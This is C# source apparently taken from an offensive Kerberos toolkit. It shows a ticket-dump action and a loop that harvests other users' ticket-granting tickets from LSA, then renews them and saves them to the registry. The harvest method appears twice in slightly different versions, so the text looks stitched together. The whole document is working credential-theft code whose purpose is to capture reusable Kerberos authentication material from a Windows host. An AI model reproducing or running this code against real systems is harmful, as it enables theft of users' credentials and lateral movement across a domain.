public void HarvestTicketGrantingTickets()
{
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");
return;
}
// get the current set of TGTs
while (true)
{
// extract out the TGTs (service = krbtgt_ w/ full data, silent enumeration
List <LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(true, new LUID(), "krbtgt", this.targetUser, null, true, true);
List <KRB_CRED> currentTickets = new List <KRB_CRED>();
foreach (var sessionCred in sessionCreds)
{
foreach (var ticket in sessionCred.Tickets)
{
currentTickets.Add(ticket.KrbCred);
}
}
if (renewTickets)
{
// "harvest" mode - so don't display new tickets as they come in
AddTicketsToTicketCache(currentTickets, false);
// check if we're at a new display interval
if (lastDisplay.AddSeconds(this.displayIntervalSeconds) < DateTime.Now.AddSeconds(1))
{
this.lastDisplay = DateTime.Now;
// refresh/renew everything in the cache and display the working set
RefreshTicketCache(true);
Console.WriteLine("[*] Sleeping until {0} ({1} seconds) for next display\r\n", DateTime.Now.AddSeconds(displayIntervalSeconds), displayIntervalSeconds);
}
else
{
// refresh/renew everything in the cache, but don't display the working set
RefreshTicketCache();
}
}
else
{
// "monitor" mode - display new ticketson harvest
AddTicketsToTicketCache(currentTickets, true);
}
if (registryBasePath != null)
{
LSA.SaveTicketsToRegistry(harvesterTicketCache, registryBasePath);
}
Thread.Sleep(monitorIntervalSeconds * 1000);
}
}
public void Execute(Dictionary <string, string> arguments)
{
if (Helpers.IsHighIntegrity())
{
Console.WriteLine("\r\nAction: Dump Kerberos Ticket Data (All Users)\r\n");
}
else
{
Console.WriteLine("\r\nAction: Dump Kerberos Ticket Data (Current User)\r\n");
}
LUID targetLuid = new LUID();
string targetUser = "";
string targetService = "";
string targetServer = "";
if (arguments.ContainsKey("/luid"))
{
try
{
targetLuid = new LUID(arguments["/luid"]);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/luid"]);
return;
}
}
if (arguments.ContainsKey("/user"))
{
targetUser = arguments["/user"];
}
if (arguments.ContainsKey("/service"))
{
targetService = arguments["/service"];
}
if (arguments.ContainsKey("/server"))
{
targetServer = arguments["/server"];
}
// extract out the tickets (w/ full data) with the specified targeting options
List <LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(true, targetLuid, targetService, targetUser, targetServer, true);
// display tickets with the "Full" format
LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Full);
}
public void HarvestTicketGrantingTickets()
{
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");
return;
}
// get the current set of TGTs
while (true)
{
// extract out the TGTs (service = krbtgt_ w/ full data, silent enumeration
List <LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(true, new LUID(), "krbtgt", this.targetUser, null, true, true);
List <KRB_CRED> currentTickets = new List <KRB_CRED>();
foreach (var sessionCred in sessionCreds)
{
foreach (var ticket in sessionCred.Tickets)
{
currentTickets.Add(ticket.KrbCred);
}
}
if (renewTickets)
{
// "harvest" mode - so don't display new tickets as they come in
AddTicketsToTicketCache(currentTickets, false);
// check if we're at a new display interval
if (lastDisplay.AddSeconds(this.displayIntervalSeconds) < DateTime.Now.AddSeconds(1))
{
this.lastDisplay = DateTime.Now;
// refresh/renew everything in the cache and display the working set
RefreshTicketCache(true);
Console.WriteLine("[*] Sleeping until {0} ({1} seconds) for next display\r\n", DateTime.Now.AddSeconds(displayIntervalSeconds), displayIntervalSeconds);
}
else
{
// refresh/renew everything in the cache, but don't display the working set
RefreshTicketCache();
}
}
else
{
// "monitor" mode - display new ticketson harvest
AddTicketsToTicketCache(currentTickets, true);
}
if (registryBasePath != null)
{
LSA.SaveTicketsToRegistry(harvesterTicketCache, registryBasePath);
}
if (runFor > 0)
{
// compares execution start time + time entered to run the harvest for against current time to determine if we should exit
if (collectionStart.AddSeconds(this.runFor) < DateTime.Now)
{
Console.WriteLine("[*] Completed running for {0} seconds, exiting\r\n", runFor);
System.Environment.Exit(0);
}
}
// If a runFor time is set and the monitoring interval is longer than the time remaining on the run,
// the sleep interval will be adjusted down to however much time left in the run there is.
if (runFor > 0 && collectionStart.AddSeconds(this.runFor) < DateTime.Now.AddSeconds(monitorIntervalSeconds))
{
TimeSpan t = collectionStart.AddSeconds(this.runFor + 1) - DateTime.Now;
Thread.Sleep((int)t.TotalSeconds * 1000);
}
// else we'll do a normal monitor interval sleep
else
{
Thread.Sleep(monitorIntervalSeconds * 1000);
}
}
}